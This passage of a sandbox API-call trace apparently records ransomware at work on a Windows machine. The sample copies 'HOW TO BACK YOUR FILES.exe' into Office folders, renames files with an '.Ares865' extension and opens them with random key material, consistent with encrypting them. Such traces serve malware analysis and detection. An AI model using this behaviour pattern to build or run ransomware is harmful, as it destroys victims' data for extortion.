files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0076.401] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2296) returned 1 [0076.401] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0076.402] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.402] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.404] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0076.405] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.405] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.405] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us" [0076.405] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x318fc8 | out: hHeap=0x2b0000) returned 1 [0076.405] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0076.405] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us") returned 92 [0076.405] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us" [0076.405] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.405] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.413] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.413] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15419830, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5f0cc200, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f0cc200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.413] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.413] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.413] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.Ares865") returned 114 [0076.413] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml.ares865"), dwFlags=0x1) returned 1 [0076.414] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.414] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1349) returned 1 [0076.414] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0076.415] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.415] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.417] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0076.418] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.418] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.418] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.Ares865") returned 117 [0076.418] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml.ares865"), dwFlags=0x1) returned 1 [0076.419] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.419] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=819) returned 1 [0076.420] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0076.420] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.420] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.422] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0076.423] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.423] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.423] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.Ares865") returned 110 [0076.423] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0076.424] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.424] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2624) returned 1 [0076.424] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0076.425] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.425] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.427] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0076.428] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.428] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.428] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures" [0076.428] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0076.428] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2600 | out: hHeap=0x2b0000) returned 1 [0076.428] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures") returned 64 [0076.429] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures" [0076.429] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.429] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.432] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.432] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xceefecc0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x5f0f2360, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f0f2360, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.433] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.433] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.433] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033" [0076.433] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0076.433] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25e0 | out: hHeap=0x2b0000) returned 1 [0076.433] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033") returned 60 [0076.433] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033" [0076.433] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.433] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.437] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.437] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1184c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f1184c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.437] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.437] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.438] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo" [0076.438] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0076.438] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2580 | out: hHeap=0x2b0000) returned 1 [0076.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo") returned 53 [0076.438] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo" [0076.438] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.438] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.442] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.442] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f1184c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f1184c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.442] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.442] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.443] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US" [0076.443] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0076.443] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2580 | out: hHeap=0x2b0000) returned 1 [0076.443] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US") returned 59 [0076.443] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US" [0076.443] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.443] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.446] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.446] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x5f1184c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f1184c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.447] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.447] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.447] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr" [0076.447] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0076.447] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7be8 | out: hHeap=0x2b0000) returned 1 [0076.447] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr") returned 62 [0076.447] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr" [0076.447] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.447] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.452] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.452] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69dc9750, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5f1184c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f1184c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.452] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.452] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.452] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink" [0076.452] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4860 | out: hHeap=0x2b0000) returned 1 [0076.452] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0076.452] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 50 [0076.452] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink" [0076.452] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.452] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.456] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.456] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f13e620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f13e620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.456] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.456] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.456] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.Ares865") returned 71 [0076.456] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.ares865"), dwFlags=0x1) returned 1 [0076.458] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.458] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=791686) returned 1 [0076.458] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0076.459] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.459] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0076.495] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0076.496] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.496] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0076.506] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.Ares865") returned 70 [0076.506] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.ares865"), dwFlags=0x1) returned 1 [0076.508] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.508] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=27045) returned 1 [0076.508] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0076.509] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, 